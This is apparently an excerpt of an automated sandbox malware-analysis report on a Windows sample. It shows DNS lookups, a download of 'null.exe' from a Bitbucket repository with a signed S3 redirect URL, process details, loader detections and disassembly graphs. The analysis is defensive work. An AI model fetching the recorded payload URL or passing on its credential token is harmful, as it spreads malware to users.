                                                                                                                      Dec 12, 2024 17:30:35.503216982 CET53597011.1.1.1192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:37.697119951 CET6139653192.168.2.101.1.1.1
                                                                                                                      Dec 12, 2024 17:30:37.842211962 CET53613961.1.1.1192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:40.022464037 CET5619853192.168.2.101.1.1.1
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET53561981.1.1.1192.168.2.10
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 12, 2024 17:30:35.365287066 CET192.168.2.101.1.1.10xc51aStandard query (0)navegacionseguracol24vip.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:37.697119951 CET192.168.2.101.1.1.10x373aStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.022464037 CET192.168.2.101.1.1.10x56bbStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 12, 2024 17:30:09.965142012 CET1.1.1.1192.168.2.100x6203No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:09.965142012 CET1.1.1.1192.168.2.100x6203No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:35.503216982 CET1.1.1.1192.168.2.100xc51aNo error (0)navegacionseguracol24vip.org181.131.217.244A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:37.842211962 CET1.1.1.1192.168.2.100x373aNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:37.842211962 CET1.1.1.1192.168.2.100x373aNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:37.842211962 CET1.1.1.1192.168.2.100x373aNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.146A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com3.5.27.151A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com54.231.195.25A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com54.231.161.209A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com52.216.60.49A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com16.182.106.41A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com16.182.105.73A (IP address)IN (0x0001)false
                                                                                                                      Dec 12, 2024 17:30:40.433372974 CET1.1.1.1192.168.2.100x56bbNo error (0)s3-w.us-east-1.amazonaws.com16.15.177.80A (IP address)IN (0x0001)false
                                                                                                                      • bitbucket.org
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.1049768185.166.143.504435980C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-12 16:30:39 UTC101OUTGET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                                                                      Host: bitbucket.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-12 16:30:39 UTC5949INHTTP/1.1 302 Found
                                                                                                                      Date: Thu, 12 Dec 2024 16:30:39 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 0
                                                                                                                      Server: AtlassianEdge
                                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWL [TRUNCATED]
                                                                                                                      Expires: Thu, 12 Dec 2024 16:30:39 GMT
                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                      X-Used-Mesh: False
                                                                                                                      Vary: Accept-Language, Origin
                                                                                                                      Content-Language: en
                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                      X-Served-By: 2da364c2065e
                                                                                                                      X-Version: b7875da02c7c
                                                                                                                      X-Static-Version: b7875da02c7c
                                                                                                                      X-Request-Count: 3516
                                                                                                                      X-Render-Time: 0.04372715950012207
                                                                                                                      X-B3-Traceid: d73e5483b2114867a34869692b0400ca
                                                                                                                      X-B3-Spanid: c05b9192f744638b
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1. [TRUNCATED]
                                                                                                                      X-Usage-Quota-Remaining: 999097.938
                                                                                                                      X-Usage-Request-Cost: 914.67
                                                                                                                      X-Usage-User-Time: 0.027440
                                                                                                                      X-Usage-System-Time: 0.000000
                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                      Age: 0
                                                                                                                      X-Cache: MISS
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                      Atl-Traceid: d73e5483b2114867a34869692b0400ca
                                                                                                                      Atl-Request-Id: d73e5483-b211-4867-a348-69692b0400ca
                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                      Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=3,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                      Connection: close


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:11:30:12
                                                                                                                      Start date:12/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\3XSXmrEOw7.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\3XSXmrEOw7.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:2'605'056 bytes
                                                                                                                      MD5 hash:DDCE3B9704D1E4236548B1A458317DD0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:11:30:30
                                                                                                                      Start date:12/12/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                      Imagebase:0xca0000
                                                                                                                      File size:2'141'552 bytes
                                                                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3789474644.0000000009540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3786964807.0000000007E72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:0.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:66.7%
                                                                                                                        Total number of Nodes:9
                                                                                                                        Total number of Limit Nodes:1
                                                                                                                        execution_graph 25861 409f24 25862 409f54 ExitProcess 25861->25862 25864 40813a 25865 40813c VirtualProtect 25864->25865 25867 4081a1 25865->25867 25868 408828 25867->25868 25870 4094b9 25867->25870 25878 4089ff 18 API calls 25868->25878 25879 4095cc 8 API calls 25870->25879

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$YQ$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-1402221123
                                                                                                                        • Opcode ID: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                        • Instruction ID: 552b3e37006ca7b93b7341b10d5ba12ce664671d15c095bbf474118e4d211da1
                                                                                                                        • Opcode Fuzzy Hash: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                        • Instruction Fuzzy Hash: 30E125A2C082649AF7208624DC45BEB7A79DF50314F0440FED94D662C1DABE5FC58BA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                        • Instruction ID: a0810739b08e09db0114f26d69ccb1495e1e5597be628df8a29aa899d8e24c60
                                                                                                                        • Opcode Fuzzy Hash: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                        • Instruction Fuzzy Hash: 8EF123A2C042649AF7208624DC447FB7A78EF51310F1440FED94DA62C1E6BE4FD6CB66

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                        • Instruction ID: fe1b180f35ded295e356599168183658795d2bfc2890c1e042ad3a4d1c9d819f
                                                                                                                        • Opcode Fuzzy Hash: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                        • Instruction Fuzzy Hash: D3F137E2D042649EF7208624EC44BE77A78EB51314F1440FED94DA62C0D6BE5FC68BA7

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 144 4074f5-407524 145 407535-407586 144->145 146 407526-407530 144->146 154 407594-4075c6 call 4075b5 145->154 155 407588 145->155 148 4075d0-4075d7 146->148 150 407619 148->150 151 4075d9-407631 148->151 150->150 161 4076d3-407714 call 407716 151->161 162 407637-407690 151->162 154->148 155->154 162->161 168 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 162->168 194 408828-408a77 call 4089ff 168->194 195 4094b9-4095cb call 4094db call 40950b call 4095cc 168->195 211 408a79-408ab5 194->211 212 408aba-408ae7 call 408ae8 194->212 226 409f60-409f62 ExitProcess 195->226 219 408e4f-408e56 211->219 212->219 222 408e58-408e94 219->222 223 408e99-408ecf call 408ed1 219->223 222->226 223->226
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                        • Instruction ID: f8ae071597d0369a0ea6e5a7ef278c1cd42b05d95af171ce00d2b1dc5b51714e
                                                                                                                        • Opcode Fuzzy Hash: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                        • Instruction Fuzzy Hash: D2F146B2C082649AF7208624DC847EB7A79DF51314F1440FED94D662C1DABE1FC68B67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 230 407ce7-407d0a 231 407d0c-407d4a 230->231 232 407d4f-407d90 230->232 234 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 231->234 237 407d92-407dd0 232->237 238 407dd5-407e99 232->238 262 408828-408a77 call 4089ff 234->262 263 4094b9-4095cb call 4094db call 40950b call 4095cc 234->263 237->234 244 408162-408168 238->244 245 407e9f-407eb5 call 407eb6 238->245 244->234 245->244 279 408a79-408ab5 262->279 280 408aba-408ae7 call 408ae8 262->280 294 409f60-409f62 ExitProcess 263->294 287 408e4f-408e56 279->287 280->287 290 408e58-408e94 287->290 291 408e99-408ecf call 408ed1 287->291 290->294 291->294
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
